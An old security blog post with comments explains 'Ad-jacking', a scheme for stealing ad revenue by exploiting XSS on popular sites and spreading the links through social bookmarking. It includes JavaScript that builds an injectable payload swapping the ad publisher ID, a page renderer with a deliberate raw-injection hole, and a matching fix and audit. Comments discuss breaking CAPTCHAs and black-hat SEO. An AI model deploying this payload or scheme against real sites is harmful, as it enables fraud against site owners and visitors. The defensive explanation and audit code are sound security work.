Mon, 10 Sep 2007 15:27:59 GMT
by pdp

Finding XSS is a dead easy task. Everybody is vulnerable to this type of issue, and even if protection mechanisms such as application firewalls and sanitization filters are in place, attackers can very often get a stable exploit working in a matter of a couple of minutes. In fact, I don't think there are unstable XSS exploits. It is not as if the attacker has to manipulate the stack or a corrupted heap in order to get some sort of execution control. No! It is a simple injection issue.

In this post I am going to summarize one of the attack strategies which I discussed in detail in my paper For my next trick - hacking Web2.0, and talked about over here. We are going to look at a very basic scenario which outlines a possible technique attackers can use in order to make money out of XSS vulnerabilities.

The strategy is quite simple. First of all, attackers need a bunch of XSS issues for various sites. The higher the ranking of these sites, the more money they will make. A good starting point is one of the known lists: the attacker can simply grab the high-ranking sites from such lists and use them for the strategy that follows. Alternatively, a simple Python script in combination with the right tooling could serve the same purpose.

So, at this stage the attackers have XSS attacks ready to be deployed. The next stage is to come up with a generic payload for all of them. This step is quite simple as well. Going back to the initial idea, there are two ways to make money: direct and indirect. I am going to cover the Ad-jacking one :). The idea is that the attackers plug an XSS payload into the page which hijacks the ad revenue. This is a dead easy task. In most cases, all the attackers need to do is to change a simple number: the publisher identifier in the ad snippet, which is what tells the ad network whose account to credit. From then on, whenever someone stumbles across the Ad-jacked page and clicks on any ad, the profit goes not to the page owner but to the attacker. Not cool.
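As an added example (not code from this post or from the paper), the following models Ad-jacking end to end against a hypothetical ad network: the `ads.example/show.js?pub=...` snippet, the `PUB-...` publisher ids and the page template are all assumptions. It pairs the attacker's payload with the vulnerable render path that lets it in, the escaped fix, and the crawl-side audit a page owner can run over their own pages to notice that the "simple number" has changed.

```javascript
// Added example, not from the original post. The ad network, its snippet
// format (https://ads.example/show.js?pub=PUB-ID) and the page template are
// hypothetical; the publisher id is the "simple number" Ad-jacking changes.

const SCRIPT_BLOCK = /<script\b[^>]*>[\s\S]*?<\/script>/gi;
const PUB_REF = /ads\.example\/show\.js\?pub=([A-Za-z0-9-]+)/g;
const PUB_ID = /^[A-Za-z0-9-]+$/;

function escapeHtml(s) {
  return s.replace(/[&<>"']/g, c =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}

// Hypothetical page: one ad unit credited to `publisherId`, followed by a
// user-supplied comment. `unsafe: true` is the XSS bug (the comment is
// concatenated raw); the default escapes it, which is the fix.
function renderPage(publisherId, comment, { unsafe = false } = {}) {
  if (!PUB_ID.test(publisherId)) throw new Error('bad publisher id');
  const body = unsafe ? comment : escapeHtml(comment);
  return '<html><body>\n' +
    '<div id="ad"><script src="https://ads.example/show.js?pub=' +
    publisherId + '"></script></div>\n' +
    '<div class="comment">' + body + '</div>\n' +
    '</body></html>';
}

// Attacker side: the script an XSS hole is used to inject. In the victim's
// browser it removes the legitimate ad loader(s) and appends one carrying
// the attacker's id, so every later ad click is credited to the attacker.
// The id is validated so the generated code cannot be broken by the value.
function buildAdjackPayload(attackerId) {
  if (!PUB_ID.test(attackerId)) throw new Error('bad publisher id');
  return [
    '(function(){',
    'var o=document.querySelectorAll(\'script[src^="https://ads.example/show.js"]\');',
    'for(var i=0;i<o.length;i++)o[i].parentNode.removeChild(o[i]);',
    'var s=document.createElement("script");',
    's.src="https://ads.example/show.js?pub=' + attackerId + '";',
    'document.body.appendChild(s);',
    '})();',
  ].join('');
}

// Defender side: every publisher id referenced from an executing <script>
// element (its src or its inline body). Escaped text outside script
// elements is ignored, so a neutralised payload does not raise an alert.
function findPublisherIds(html) {
  const ids = [];
  for (const block of html.match(SCRIPT_BLOCK) || []) {
    for (const m of block.matchAll(PUB_REF)) ids.push(m[1]);
  }
  return ids;
}

// Audit a fetched copy of your own page: any id other than the one you
// expect means the ad revenue is being redirected.
function auditPublisherIds(html, expectedId) {
  const foreign = findPublisherIds(html).filter(id => id !== expectedId);
  return { ok: foreign.length === 0, foreign };
}

// Stand-alone demo with constructed input.
const payload = '<script>' + buildAdjackPayload('PUB-9999') + '</script>';
const hijacked = renderPage('PUB-1111', payload, { unsafe: true });
const fixed = renderPage('PUB-1111', payload);
console.log('vulnerable page:', auditPublisherIds(hijacked, 'PUB-1111'));
console.log('fixed page:     ', auditPublisherIds(fixed, 'PUB-1111'));
```

The audit only greps the static HTML that a crawler sees; a payload that assembles the loader URL from pieces, or fetches it from another host, slips past the regex. For real monitoring, render the page in a headless browser and compare the ad network requests it actually makes against the expected publisher id.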

The final stage is to get the XSSed URLs and their payloads out for general consumption. Attackers can use the power of Web2.0 technologies here. Social bookmarking sites fit very well. The more the attackers bookmark the Ad-jacked URLs, the more money they will make out of them. There are even services like OnlyWire, which allow attackers to distribute the URLs to 20 or more different social bookmarking websites in a single go. Of course, attackers will keep websites with very, very, very high ranking for services such as DIGG and Reddit, which need manual submission since both of them have CAPTCHAs. But, heh, CAPTCHAs can be easily broken as well.

Now search engines, aggregators, and other robotic things will start exploring and crawling the Ad-jacked websites. People will start visiting them and looking for info inside them, and every once in a while someone will click on the ads. The only problem is that site owners will be sharing their profit with the crooks.

So, this is it! More information about this issue is outlined in the paper. Have a look through it if you have time.

I thought you were going to say something about black hat seo / xss :[
well, if u think about it... this technique is pretty black hat seo like
CAPTCHAs can be easy broken as well.
kork, heh :) no code, but you can check out some of the successful projects currently available for free that do break most of the CAPTCHAs. The other day I had a brief discussion with AP about how to break CAPTCHAs. We concluded that almost every CAPTCHA can be broken, to one degree or another, with simple customized scripts and a couple of open source OCR tools from Freshmeat. So, no code is available, and I doubt that we are ever going to publish any code on this, mainly because it would be highly unethical. So you have to take my word for it and look into the subject yourself.
CAPTCHAs are dead!
Just like phishing you can use a transparent image as an overlay to subvert clicks to some other site, which could realistically put some money in your pocket depending on the type of traffic the site generates. I think I've read on some SEO sites that this is usually done on sites such as Wikipedia.
Yeah, I think this is a blackhat SEO technique. Pretty neat if you ask me. Been doing a lot of reading on it. It pawns.
Pdp, nice article! Ad-jacking is an interesting way to make money out of XSS. But what about other ways? :-) Such as the black SEO way of making money out of XSS holes. You need to cover different sides of this topic (think about it, maybe in future you'll write about other ways). Though this is an interesting one.
Of course, attackers will keep websites with very, very, very high ranking for services such as DIGG and Reddit for manual submission, since both of them have CAPTCHAs
After I read your post on 12.09.2007, I looked at Digg's captcha and found that it's vulnerable (to my MustLive CAPTCHA bypass method). So this captcha, like a lot of others, can be easily bypassed (with my method).
Petko, captchas can be bypassed (using vulnerabilities in them, without any OCR). I explored this topic a lot lately. Like I wrote at my site, I'll write an article about my MustLive CAPTCHA bypass method. And I am planning to make an event about bypassing a lot of CAPTCHAs ;-) (with my method). I'll write to you in detail about this.
kork, there will be a whole month which I'll make: Month of Bugs in CAPTCHAs. This month will be full of code (exploits) for bypassing captchas all over the Internet. So keep waiting for the official announcement. You will be happy ;-), everyone will be happy, especially bad guys, but good guys too.
no code but you can check out some of the successful projects currently available for free that does break most of the CAPTCHAs.
You are speaking mostly about OCR breaking of captchas or breaking with manual typing (low-cost manpower). But there is a way (with my methods, main and advanced) to bypass a lot of captchas on the Internet.
CAPTCHAs are dead!
Not all captchas - many are still trying (for their last days). And many are still making it look like "they are working fine". And many others still believe that captchas can protect them (security sites also - there are a lot of vulnerable captchas on security sites as well). But I'll show the web community and their captchas real life ;-). Very soon the Internet will see the Captcha Apocalypse. A lot of captchas will die. The time has come.
MustLive, you are right that there are bugs in CAPTCHA mechanisms, but if they are implemented correctly, there is no other way to break out of them but to type the string. So, OCR will remain the primary and most generic way of breaking captchas.
Nice information, I have already read about the SEO but I don't know how to use that black hat SEO..
XSS can be a good way to get some backlinks. Creating an HTML page that has 100s of HTML links and having the spider index it. Thanks for this article!